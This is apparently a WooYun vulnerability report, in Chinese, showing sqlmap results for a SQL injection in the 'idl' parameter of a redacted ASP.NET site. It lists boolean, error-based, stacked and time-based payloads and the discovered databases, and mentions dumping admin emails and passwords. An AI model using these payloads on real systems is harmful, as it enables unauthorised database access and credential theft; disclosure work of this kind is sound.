WooYun.org

3、查看所有库（以http://**.**.**.**/zhonggang/TeBieZhuanLan4.aspx?id=227&idl=0为例）：
Parameter: idl (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=227&idl=0' AND 9742=9742 AND 'CFUY'='CFUY
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=227&idl=0' AND 9467=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(
118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9467=9467) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(113))) AND 'iMTk'='iMTk
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=227&idl=0';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: id=227&idl=0' WAITFOR DELAY '0:0:5'-----
[17:04:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
--------------
available databases [3]:
[*] hds0750164_db
[*] master
[*] tempdb
3、当前库是hds0750164_db，那就看一下这个库的表：

4、再看一下iCompany_Admin这个表中的字段：

5、我们再看一下字段AdminEmail，AdminPassword的数据：

6、其他的就不再看了吧，列了这些应该能说明该漏洞了吧。